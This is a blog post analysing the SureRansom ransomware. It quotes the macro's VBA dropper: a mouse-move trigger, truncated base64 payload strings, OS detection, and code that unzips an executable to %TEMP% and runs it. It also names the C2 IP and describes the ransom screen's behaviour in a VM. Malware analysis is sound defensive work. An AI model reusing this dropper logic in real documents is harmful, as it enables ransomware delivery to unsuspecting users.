Analyzing SureRansom - Part 1

21/01/2018 by 0xm4v3rick|  24/01/2018

Updated based on some suggestions from Abhay. Thanks to him!!

Hello!! Long time since the last post! Although I don’t have much experience doing malware reverse engineering, I tried to play with a ransomware with my limited skill set in this area. This is the first part of this post. Below are the observations and walk-through of my analysis.

A tweet led me to this ransomware that was being detected to use a bogus 2 factor activation to trigger by mouse movement. https://twitter.com/JohnLaTwC/status/952948929628291072
The VBA source and the hashes can found here as per the tweet. https://pastebin.com/raw/UL8C6KJj
Files are also available here
Hash: sha256 0acc9adbbdbd6db359552e2919aabc3ca4a42a28b3b7c3d26fb8f0699d23bdc2 payloadv10.exe
The VBA was extracted with the oletools which is pretty good at it as seen from pastebin post. So, lets try and analyze it.

The first part of the VBA is a function to check the mouse movements. It will get activated as the mouse moves and execute the further code.

Public Sub Label1_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, _

                           ByVal X As Single, ByVal Y As Single)
Label1.Enabled = False

The next part uses ReDim to store base64 encoded payload. Zip files when base64 encoded start with UEsDBBQAAAAIA. The zip file contains the ransomware exe.
data10 ReDim is used to store this encoded data which will be used in case the operating system is Windows 10. We will see how to find it out during further analysis. Similarly, different ransomware binaries are built and encoded for various OS in variables data81 for windows 8.1, data7 for windows 7

ReDim data10(0 To 0) As String
data10(UBound(data10)) = "UEsDBBQAAAAIAPNKd0pTxbbEeFoAAAB2AgAOAAAAcGF5bG9hZHYxMC5leGXtXQlglMX1n93NsdlN": ReDim Preserve data10(0 To UBound(data10) + 1) As String
data10(UBound(data10)) = "NtncCSALCIYr5IIkIEfIQaLcCadYu0kWWNlkw+4mkKIttFVrtbb2sH9tvSuI1gOrVitarVK1HpWq": ReDim Preserve data10(0 To UBound(data10) + 1) As String
----snip----
data10(UBound(data10)) = "nDef/wdQSwECFAAUAAAACADzSndKU8W2xHhaAAAAdgIADgAAAAAAAAAAAAAAAAAAAAAAcGF5bG9h": ReDim Preserve data10(0 To UBound(data10) + 1) As String
data10(UBound(data10)) = "ZHYxMC5leGVQSwUGAAAAAAEAAQA8AAAApFoAAAAA": ReDim Preserve data10(0 To UBound(data10) + 1) As String

Next, a few variables are defined for further use.

Set wshShell = CreateObject("WScript.Shell")
​​Dim result

Below code uses WMIC to gather OS related information which will be used to select the payload as we discussed above. All the gathered data is stored in oss.

Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
strComputer = "."
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set oss = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")

Below code selects OS version values and compares it in switch case to determine the appropriate payload. The case with value 10 represent windows 10 system. It than retrieves the TEMP directory location, and appends payloadv10 to it. This will be the fullpath of our zip/exe file.

For Each os In oss    
    Dim operatingSystem    
    operatingSystem = os.Version
    operatingSystem = Left(operatingSystem, 3)
    Select Case operatingSystem

    Case "10."
        ' Windows 10
        sourceRoot = wshShell.ExpandEnvironmentStrings("%TEMP%") & "\payloadv10"

Next, the extensions are added. The Base64Save function is called with argument data10 and sourcezip. This function will retrieve the data from data7 variable and create a zip file out of it at location mentioned in sourcezip, with exe named with value mentioned in sourceExe inside it. Check out the Base64Save function from the pastebin link or here.

        sourceZip = sourceRoot & ".zip"
        sourceExe = sourceRoot & ".exe"
        Base64Save data10, sourceZip

The destination folder holds the location of TEMP and the zip file is unzipped via a call to the Unzip function and the exe is run through Call Shell function. Check out the Unzip function from the pastebin link or here.

        destinationFolder = wshShell.ExpandEnvironmentStrings("%TEMP%")
        result = Unzip(sourceZip, destinationFolder)
        Call Shell(sourceExe)

Remaining cases are executed based on the condition explained above. The above VBA code is written in module ThisDocument. The base64save and Unzip functions are written in separate module named Module1.

Next, let’s execute the above macro safely and retrieve the ransomware binary for analysis. Note that Call Shell(sourceExe) needs to be commented with ' to ensure it does not run the binary. I have separated the macro code for windows 10 which can be used from here . To run the macro, we will need MS office obviously and the macro code. The function, tracking mouse movement has been removed and some parts are added and commented for better understanding and safety as you will see further. Similarly, code for other operating systems can be prepared and run from the original macro.
You will need to create a module in the macro editor to allow you to add the code there. Delete the macro sub created by the editor. Marked code is added/commented as explained above.

5

Next, we will run the code. Check the MsgBox that will display the location of temp file where our zip and exe files will be present. Let’s go to that directory and check for the files.

6

10

Now let’s do some static analysis on the obtained exe. Let’s check the type of file obtained. It suggests that executable is PE32 binary file.

7

Running strings on it gives us a clue on the .net framework and visual studio being used. Also at the end we see a folder location being left behind named "SureCloud".  So does this have anything to do with SureCloud company?? No hard proof.

8

9

Next, I went about running the ransomware on an isolated win 10 VM without any internet connection to see how it reacts. Upon running it immediately flashed its screen to try and lock out the user with an option to pay the £50 for the key.
The algorithm used is mentioned as AES256. which is not very convincing for the fact that it’s a symmetric key algorithm which is generally not used by ransomwares. As it turns out ransomwares do use symmetric algorithm. The key is than encrypted with public-private encryption scheme. If not, it is highly likely that the key is hardcoded or no encryption is performed. Hardcoded keys will exist somewhere in the code and can be recovered. If no encryption is performed than this is just an attempt to scare the victim into paying the amount without much efforts. I went ahead and clicked the purchase key option to see what happens and I got the below error.

11

Error is related to .net framework while making a web request to the host 138.68.176.166 as shown above. Searching for the IP address on censys.io, we get below information. The system is hosted on Digital Ocean and suggests www.competitivebeauty.com domain hosted via WordPress. This looks like a zombie server compromised to act as proxy. Probably compromised via WordPress or SSH brute force as SSH is enabled on it.

1

31

Quitting the error brings me back to my desktop and I was able to work on the VM as usual which seems strange. Looks like no files were encrypted.

That is all for this post. This is all I could gather from the first look on the ransomware. I will try and come up with another post analysis and diving deep into binary analysis to improve my reversing skills as well. 😉 If you liked/disliked the post leave a comment/feedback.

Thanks for dropping by!!!


malware vba macro

Share on:  Diaspora*